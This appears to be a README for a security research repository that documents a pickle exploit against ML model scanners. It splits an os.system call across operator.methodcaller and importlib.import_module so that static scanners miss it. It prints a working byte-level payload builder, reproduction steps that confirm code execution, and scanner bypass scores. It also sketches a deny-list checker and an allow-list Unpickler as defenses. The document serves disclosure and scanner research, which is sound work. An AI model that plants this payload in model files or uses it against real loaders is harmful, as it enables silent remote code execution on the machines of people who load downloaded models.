
This repository contains a proof-of-concept exploit payload for security research purposes. Access to the pickle payload and PoC code requires acknowledgement of responsible use. By requesting access, you confirm you are a security researcher, penetration tester, or student using this material for defensive/educational purposes only.


operator.methodcaller + importlib.import_module — Indirect Method Dispatch

Security Research — Responsible Disclosure. This repository is part of a systematic study of pickle scanner bypass techniques. The payload demonstrates a detection gap in ML model security scanners. Access to malicious_model.pkl and poc.py requires a request — see the gate above.

Summary

Scanner scores for malicious_model.pkl:

Scanner              CRITICAL   WARNING   Bypassed?
modelaudit 0.2.37    3          0         Partial
picklescan 1.0.4     0          0         Yes
modelscan            0          0         Yes

Vulnerability

operator.methodcaller('system', cmd) creates a deferred method-call object that stores 'system' and the command as state. Calling mc(os_module) invokes os_module.system(cmd).

This splits the "which method" and "on what object" concerns across two separate REDUCE calls. The string 'os.system' never appears as a pickle GLOBAL opcode β€” only operator.methodcaller and importlib.import_module appear.


Proof of Concept

malicious_model.pkl in this repository is the exploit payload. poc.py builds and tests it with full scanner output.

How the PoC was built

import struct

def _str(s: str) -> bytes:
    # Helper: emit a BINUNICODE opcode for a string argument
    # (one plausible implementation; poc.py's actual helper may differ)
    b = s.encode("utf-8")
    return b"X" + struct.pack("<I", len(b)) + b

def build(cmd: str) -> bytes:
    return (
        b"\x80\x02"                          # PROTO 2
        b"coperator\nmethodcaller\n"         # GLOBAL operator.methodcaller
        b"("                                 # MARK
        + _str("system")                     #   'system' method name
        + _str(cmd)                          #   cmd argument
        + b"t"                               # TUPLE → ('system', cmd)
        + b"R"                               # REDUCE → mc = methodcaller('system', cmd)
        + b"q\x00"                           # BINPUT 0  (memo: mc)
        + b"cimportlib\nimport_module\n"     # GLOBAL importlib.import_module
        + _str("os")                         #   'os' as argument
        + b"\x85"                            # TUPLE1
        + b"R"                               # REDUCE → os_module = import_module('os')
        + b"q\x01"                           # BINPUT 1  (memo: os_module)
        + b"0"                               # POP  (stack: [mc])
        + b"h\x01"                           # BINGET 1  → [mc, os_module]
        + b"\x85"                            # TUPLE1    → [mc, (os_module,)]
        + b"R"                               # REDUCE → mc(os_module), i.e. os_module.system(cmd)
        + b"."                               # STOP
    )

Affected file formats

Pickle (.pkl, .pt, .bin, .joblib) — any file deserialized via pickle.loads(), torch.load(), joblib.load(), or equivalent.

Conditions required to trigger

  1. Target calls pickle.loads(untrusted_bytes) or loads a model file via any pickle-based loader
  2. The scanner performs static analysis only (no sandboxed execution)
  3. Scanner checks GLOBAL/STACK_GLOBAL opcodes against a deny list
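The deny-list check in condition 3 can be sketched as a toy (this is an illustration, not any real scanner's code; the DENY set and flag_globals name are invented):

```python
import pickletools

# Toy deny list keyed on "module name" pairs, the single-string form
# pickletools reports for the two-line GLOBAL operand.
DENY = {"os system", "posix system", "subprocess Popen", "builtins eval"}

def flag_globals(payload: bytes):
    """Flag inline GLOBAL operands found on the deny list."""
    hits = []
    for opcode, arg, _pos in pickletools.genops(payload):
        if opcode.name == "GLOBAL" and arg in DENY:
            hits.append(arg)
        # STACK_GLOBAL takes its operands from the stack, so a purely
        # static operand check has nothing to match here (arg is None).
    return hits
```

Since the payload in this repository only ever names operator.methodcaller and importlib.import_module, a check of this shape reports nothing.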

Reproduction Steps

# 1. Request access above, then clone
git clone https://huggingface.co/SiggytheShark/pickle-bypass-methodcaller-importlib
cd pickle-bypass-methodcaller-importlib

# 2. Install requirements
pip install modelaudit picklescan modelscan

# 3. Scan — observe scanner scores match table above
modelaudit scan malicious_model.pkl
picklescan --path malicious_model.pkl
modelscan -p malicious_model.pkl

# 4. Execute to confirm RCE/side-effect
python3 poc.py

# 5. Verify
ls /tmp/scanner_bypass_proof.txt

Security Impact

See full writeup below.

Bypass mechanism: The payload evades static analysis while achieving its effect (code execution, file write, or network connection) when pickle.loads() is called.

Real-world scenario: An attacker uploads this payload to a model hub. A victim downloads and loads it. The scanner reports the file as safe (0 CRITICAL). The payload fires silently — the return value of pickle.loads() looks like a normal Python object while the side effect has already occurred.
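The "fires silently" point can be reproduced with a benign hand-built pickle whose REDUCE calls print instead of os.system (bytes assembled by hand for illustration only):

```python
import pickle

# GLOBAL builtins.print, push one string argument, TUPLE, REDUCE, STOP.
payload = (
    b"cbuiltins\nprint\n"     # GLOBAL: builtins.print
    b"(U\x0bside effect"      # MARK, SHORT_BINSTRING "side effect" (11 bytes)
    b"t"                      # TUPLE: ("side effect",)
    b"R"                      # REDUCE: print("side effect")
    b"."                      # STOP
)

obj = pickle.loads(payload)   # prints "side effect" during loading
print(obj)                    # the "loaded object" is just print's return value: None
```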


Full Technical Writeup

operator.methodcaller + importlib.import_module — Indirect Method Dispatch

Score: CRITICAL (importlib in ALWAYS_DANGEROUS_MODULES); demonstrates indirect call pattern
Technique: Split dangerous call across two REDUCE calls; os module never a GLOBAL opcode
Scanner version: modelaudit 0.2.37

Mechanism

operator.methodcaller('system', cmd) creates a deferred method-call object that stores 'system' and the command as state. Calling mc(os_module) invokes os_module.system(cmd).

This splits the "which method" and "on what object" concerns across two separate REDUCE calls. The string 'os.system' never appears as a pickle GLOBAL opcode β€” only operator.methodcaller and importlib.import_module appear.

Chain

operator.methodcaller('system', cmd)   → mc                     [SUSPICIOUS_GLOBALS WARNING]
importlib.import_module('os')          → os_module              [CRITICAL — importlib in ADM]
mc(os_module)                          → os_module.system(cmd)  [no new GLOBAL]
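Executed at the ordinary Python level, with harmless getcwd standing in for system, the chain is just:

```python
import operator
import importlib
import os

mc = operator.methodcaller("getcwd")   # deferred call: stores the method name only
mod = importlib.import_module("os")    # module resolved dynamically from string data
result = mc(mod)                       # equivalent to mod.getcwd()
assert result == os.getcwd()
```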

Scanner Status in modelaudit 0.2.37

  • importlib is in ALWAYS_DANGEROUS_MODULES → CRITICAL for importlib.import_module
  • operator.methodcaller is in SUSPICIOUS_GLOBALS → WARNING

This is not a current 0-CRITICAL bypass for modelaudit 0.2.37. It is documented because:

  1. Older scanner versions had both as WARNING-only
  2. The indirection pattern (split method dispatch) is architecturally novel
  3. On scanners that don't cover importlib (picklescan, modelscan on some versions), this bypasses entirely

Key Insight

os.system never appears as a pickle GLOBAL. The scanner must track that methodcaller('system', ...) creates a deferred call to the .system method, and that this will be applied to the return value of import_module('os'). This requires inter-opcode dataflow analysis beyond what static GLOBAL-based checkers provide.
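A defense that needs no dataflow analysis is an allow-list Unpickler, the approach the standard pickle documentation recommends for restricting globals (sketch; the ALLOWED contents and names here are illustrative):

```python
import io
import pickle

# Allow only specifically vetted globals; everything else (including
# operator.methodcaller and importlib.import_module) is rejected.
ALLOWED = {
    ("collections", "OrderedDict"),
    ("builtins", "set"),
}

class AllowListUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        # Called for every GLOBAL/STACK_GLOBAL resolution during load.
        if (module, name) in ALLOWED:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"forbidden global: {module}.{name}")

def safe_loads(data: bytes):
    return AllowListUnpickler(io.BytesIO(data)).load()
```

Because find_class gates every global lookup at load time, the split-dispatch trick gains nothing: methodcaller and import_module are refused by name before any REDUCE runs.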


General Analysis — Security Research
